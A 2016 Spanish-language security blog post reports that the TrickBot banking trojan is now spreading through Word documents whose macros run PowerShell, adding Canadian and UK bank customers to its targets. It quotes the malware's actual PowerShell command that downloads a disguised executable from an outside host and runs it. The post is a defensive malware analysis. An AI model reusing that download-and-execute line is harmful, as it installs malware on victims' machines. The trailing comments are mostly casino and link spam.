martes, 29 de noviembre de 2016

Continúan las andanzas de Trickbot

Hasta ahora encontrábamos el troyano bancario TrickBot como un binario aislado, pero abandona su comportamiento para seguir un modus operandi más habitual de éste tipo de amenazas. Además, cabe destacar que a pesar de comenzar en Australia y avanzar cruzar el charco hasta Europa, esta vez ha llegado a Canadá.

Captura del documento de Word que solicita habilitar el contenido


Esta vez, encontramos un documento de Word el cual nos pide que habilitemos la edición y el contenido, de esta manera permitiendo que se ejecuten las macros incluidas dentro del documento de Word.

Esta macro, lanza a través de Powershell la descarga de un archivo remoto .png, que a pesar de su extensión no es una imagen...

PowerShell (New-Object System.Net.WebClient).DownloadFile('hxxp://wingsbiotech.com/kufma/sdogsodngsdlk.png','C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe');Start-process 'C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe';

Tras la descarga de la falsa iagen ".png", se almacena en %temp% para posteriormente ser ejecutado con una llamada a start-process


Una vez lograda la infección, comienza a conectarse a servidores remotos para descargar la configuración necesaria para su funcionamiento (tal y como vimos en la anterior una-al-día).

Esta vez, además de a los clientes de las entidades ya mencionadas se suman a la lista de afectados Santander UK y a BMO, conocido como "Bank of Montreal" (Canadá).

Recuerda que si recibes un documento por parte de un desconocido no debes abrirlo. A esto debemos añadir, que no se deben habilitar posibles ejecuciones de contenido en documentos de Office cuando el destinatario de este es desconocido, para evitar este tipo de amenazas.

Más información:

una-al-dia (07/11/2016) El troyano bancario TrickBot azota a Europa
  


Fernando Díaz

47 comentarios:

  1. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  2. Mantap articlenya

    http://maritimtours.com/tanjung-lesung/

    ResponderEliminar
  3. it's good to use video, so it's easy to understand

    ResponderEliminar
  4. nice article, nice tutorial, thank's for your sharing article

    ResponderEliminar
  5. it's good to use video, so it's easy to understand

    ResponderEliminar
  6. Terima kasih atas informasi yang menarik ini.

    ResponderEliminar
  7. Thanks for sharing such a great article with us Thanks a lot.
    ลิงค์รับทรัพย์

    ResponderEliminar
  8. Positive site, Read articles on this website, I really like your style. Thanks 카지노사이트

    ResponderEliminar
  9. Continue sharing such an excellent post. Glad that I found this, Thankyou.온라인카지노

    ResponderEliminar
  10. Continue for sharing such a excellent post here. Keep on sharing, Cheers 카지노사이트탑

    ResponderEliminar
  11. This is a tremendous post Keep up the great work. Sharing is nice keep it up 카지노사이트킹

    ResponderEliminar